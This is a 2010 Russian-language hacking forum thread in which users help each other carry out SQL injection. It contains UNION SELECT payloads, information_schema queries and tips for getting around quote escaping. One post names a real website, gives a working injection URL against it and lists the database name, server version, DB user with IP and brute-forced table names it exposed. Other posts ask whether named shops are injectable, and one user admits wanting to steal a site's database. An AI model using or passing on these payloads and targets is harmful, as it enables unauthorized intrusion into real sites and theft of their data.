17.01.2010, 18:52
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
|
|
|
17.01.2010, 20:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Gidz
спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
Если подобрал поля, но ни одно из них не выводится, вероятно всего - это именно тот случай. После подстановки "-", "and 1=0" все должно заработать.
|
|
|
|
18.01.2010, 00:19
|
|
Banned
Регистрация: 28.12.2009
Сообщений: 30
С нами:
8615506
Репутация:
0
|
|
есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
|
|
|
|
18.01.2010, 00:57
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от Серёжа393
есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
union select 1,2,database(),4,5
3 - выводимая колонка.
|
|
|
|
18.01.2010, 13:41
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от v1d0qz
union select 1,2,database(),4,5
3 - выводимая колонка.
При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица. Делается это так:
Код:
SELECT table_schema FROM information_schema.tables WHERE table_name = 'твоя_таблица'
Если кавычки экранируются, переводи либо в HEX либо в CHAR.
|
|
|
|
18.01.2010, 00:38
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
concat_ws(0x3a,table_schema,table_name,column_name )
|
|
|
|
18.01.2010, 04:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
Если через тулзу:
http://www.akos-icco.ru/news.php?part=1+or+1=1+and+substring(version(),1,1)=4--+
database(): w_akos
version(): 4.1.20-1.gms
@@version_compile_os: pc-linux-gnu
user(): w_akos@195.42.160.50
Post-метод, настройки:
$bl_url = "http://www.akos-icco.ru/news.php?part=1+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "8 декабря 2008";
$bl_error_type = 1;
Скрипт сохранить в ANSI-формате
Brute tables
-------------
members
subscribe
news
articles
Дальше сам
Последний раз редактировалось Pashkela; 18.01.2010 в 04:07..
|
|
|
|
18.01.2010, 04:20
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
В поис вставляем галочку site/list.aspx?q=' Получаем:
Server Error in '/' Application.
Invalid operator for data type. Operator equals modulo, type equals varchar.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid operator for data type. Operator equals modulo, type equals varchar.
Source Error:
Line 94: paramCollection.Add(new SqlParameter("@Keywords", keywords));
Line 95: paramCollection.Add(new SqlParameter("@StatusId", statusId));
Line 96: DataTable dt = Sql.ExecuteQuery("dt", "spCourse_Search", paramCollection);
Line 97: return dt;
Line 98: }
Source File: d:\websites\LocalUser\modernsalonlearningc\App_Cod e\Course.cs Line: 96
Stack Trace:
Дальше лабудень непонятная. Это что значит? уязвимость? Можно базу собрать? Просто с sql не знаком, если скажете что можно - буду читать, учить, пробовать. Очень база с сайта нужна.
|
|
|
|
18.01.2010, 04:21
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9541076
Репутация:
82
|
|
Ошибка в типах. Это не инъекция
|
|
|
|
18.01.2010, 15:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает
Wrong usage of UNION and ORDER BY
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''99999999, 25' at line 1
?
Спасибо.
Последний раз редактировалось mff; 18.01.2010 в 16:03..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
